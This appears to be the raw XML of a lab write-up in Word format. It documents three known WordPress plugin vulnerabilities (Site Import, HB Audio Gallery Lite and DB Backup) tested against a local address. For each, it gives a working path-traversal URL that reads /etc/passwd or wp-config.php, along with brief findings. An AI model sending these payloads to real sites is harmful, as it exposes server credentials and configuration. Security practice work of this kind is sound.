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F013" w14:textId="40C2D07D" w:rsidR="00427B1B" w:rsidRDefault="00427B1B" w:rsidP="00427B1B">
      <w:r w:rsidRPr="00427B1B">
        <w:t>WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5CCE">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5CCE">
        <w:t>EDB-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 39558</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E17C93" w14:textId="71C03D9D" w:rsidR="00427B1B" w:rsidRDefault="00427B1B" w:rsidP="00427B1B">
      <w:bookmarkStart w:id="0" w:name="_Hlk98957924"/>
      <w:r>
        <w:t>Passed  the url:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="770895C9" w14:textId="73D5A671" w:rsidR="00427B1B" w:rsidRDefault="00427B1B" w:rsidP="00427B1B">
      <w:r w:rsidRPr="00427B1B">
        <w:t>http://192.168.33.10/wp-content/plugins/site</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00427B1B">
        <w:t>import/admin/page.php?url=../../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6944B5B8" w14:textId="69232A27" w:rsidR="005F5F97" w:rsidRDefault="005F5F97" w:rsidP="00427B1B">
      <w:bookmarkStart w:id="1" w:name="_Hlk100077336"/>
      <w:r>
        <w:t>What is found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873B4D0" w14:textId="78A83D4D" w:rsidR="00CB3B69" w:rsidRDefault="00CB3B69" w:rsidP="00427B1B">
      <w:r>
        <w:t xml:space="preserve">Through the web there is a vulnerability to access a file on the server. Using the path above to get access not only to a file but where password is located. </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="327D95E4" w14:textId="77777777" w:rsidR="00CB3B69" w:rsidRDefault="00CB3B69" w:rsidP="00427B1B"/>
    <w:p w14:paraId="05E5EED2" w14:textId="665F34DC" w:rsidR="00C2350E" w:rsidRDefault="00427B1B" w:rsidP="00427B1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BD1B904" wp14:editId="0CAFF70B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C6D8" w14:textId="52A2BCAF" w:rsidR="00427B1B" w:rsidRDefault="00427B1B" w:rsidP="00427B1B"/>
    <w:p w14:paraId="482D6C27" w14:textId="119AE133" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="7DBE0A82" w14:textId="7EA62B23" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="47D1DF1E" w14:textId="5969500C" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="3830C782" w14:textId="42629653" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="5B2DCEA9" w14:textId="075E0170" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="3C69E993" w14:textId="4632759B" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="18D6A6E9" w14:textId="7DCDE5D3" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="5EF6BDCC" w14:textId="3ADC158C" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="28337EEB" w14:textId="5A98B5CA" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="2DD9E539" w14:textId="7FF84798" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B"/>
    <w:p w14:paraId="72DF98F0" w14:textId="06FB1FCF" w:rsidR="00EB1CAE" w:rsidRDefault="00EB1CAE" w:rsidP="00427B1B"/>
    <w:p w14:paraId="6AFFFBF9" w14:textId="77777777" w:rsidR="00EB1CAE" w:rsidRDefault="00EB1CAE" w:rsidP="00427B1B"/>
    <w:p w14:paraId="557249B9" w14:textId="7FA37768" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B">
      <w:r w:rsidRPr="006E4389">
        <w:lastRenderedPageBreak/>
        <w:t>WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download</w:t>
      </w:r>
      <w:r w:rsidR="008B5CCE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5CCE">
        <w:t>EDB-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 39589</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B15B9" w14:textId="1CC778EA" w:rsidR="006E4389" w:rsidRDefault="006E4389" w:rsidP="00427B1B">
      <w:r w:rsidRPr="006E4389">
        <w:t>Passed  the url:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="005F5F97" w:rsidRPr="003B2299">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.33.10/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&amp;file_size=10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1686B875" w14:textId="77777777" w:rsidR="0004145B" w:rsidRDefault="0004145B" w:rsidP="00E509C8"/>
    <w:p w14:paraId="57C36825" w14:textId="0FB464AB" w:rsidR="00E509C8" w:rsidRDefault="00E509C8" w:rsidP="00E509C8">
      <w:r>
        <w:t>What is found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F32BF" w14:textId="129965FF" w:rsidR="00E509C8" w:rsidRDefault="00E509C8" w:rsidP="00E509C8">
      <w:r>
        <w:t>This is another vulnerability t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hrough the web there to access a file on the server. Using the path above to get access not only to a file but where password is located. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E0BD57" w14:textId="2B766BC5" w:rsidR="005F5F97" w:rsidRDefault="005F5F97" w:rsidP="00427B1B"/>
    <w:p w14:paraId="435A8933" w14:textId="07B68914" w:rsidR="00427B1B" w:rsidRDefault="006E4389" w:rsidP="00427B1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72F14BD8" wp14:editId="51D4252B">
            <wp:extent cx="5943600" cy="6602095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6A7C" w14:textId="4AC2BC96" w:rsidR="00C41B43" w:rsidRDefault="00C41B43" w:rsidP="00427B1B"/>
    <w:p w14:paraId="52B321CE" w14:textId="3B4BE0B4" w:rsidR="008B5CCE" w:rsidRDefault="008B5CCE" w:rsidP="00427B1B">
      <w:r w:rsidRPr="008B5CCE">
        <w:lastRenderedPageBreak/>
        <w:t>WordPress Plugin DB Backup - Arbitrary File Download</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - EDB-ID 35378</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FB90C" w14:textId="400787B0" w:rsidR="008B5CCE" w:rsidRDefault="008B5CCE" w:rsidP="00427B1B">
      <w:r w:rsidRPr="006E4389">
        <w:t>Passed  the url:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5CCE">
        <w:t>http://192.168.33.10/wp-content/plugins/db-backup/download.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A85B86" w14:textId="77777777" w:rsidR="00B97B9F" w:rsidRDefault="00B97B9F" w:rsidP="00B97B9F"/>
    <w:p w14:paraId="6394AA1B" w14:textId="3E4DC5C1" w:rsidR="00B97B9F" w:rsidRDefault="00B97B9F" w:rsidP="00B97B9F">
      <w:r>
        <w:t>What is found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EC7A4" w14:textId="64F3C817" w:rsidR="00B97B9F" w:rsidRDefault="00B97B9F" w:rsidP="00B97B9F">
      <w:r>
        <w:t xml:space="preserve">Through the </w:t>
      </w:r>
      <w:r>
        <w:t>file path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there is a vulnerability to access a file on the server. Using the path above to get access not only to a file but where password is located </w:t>
      </w:r>
      <w:r>
        <w:t>and download the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1BBE1" w14:textId="77777777" w:rsidR="00B97B9F" w:rsidRDefault="00B97B9F" w:rsidP="00427B1B"/>
    <w:p w14:paraId="2BD20D5B" w14:textId="3D24AD6F" w:rsidR="00C41B43" w:rsidRPr="00427B1B" w:rsidRDefault="008B5CCE" w:rsidP="00427B1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E74AC0" wp14:editId="222BAA47">
            <wp:extent cx="4848225" cy="207645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B43" w:rsidRPr="00427B1B" w:rsidSect="00E509C8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1B"/>
    <w:rsid w:val="0004145B"/>
    <w:rsid w:val="00427B1B"/>
    <w:rsid w:val="005F5F97"/>
    <w:rsid w:val="006E4389"/>
    <w:rsid w:val="007A6E59"/>
    <w:rsid w:val="008B5CCE"/>
    <w:rsid w:val="00935EEB"/>
    <w:rsid w:val="00945EA1"/>
    <w:rsid w:val="00B97B9F"/>
    <w:rsid w:val="00C41B43"/>
    <w:rsid w:val="00CB3B69"/>
    <w:rsid w:val="00E05B95"/>
    <w:rsid w:val="00E509C8"/>
    <w:rsid w:val="00EB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B838"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B2933F70-2E2E-4771-8A2F-98890E4A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92.168.33.10/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&amp;file_size=1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Lindsey</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Harry Lindsey</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-06T00:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-06T00:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>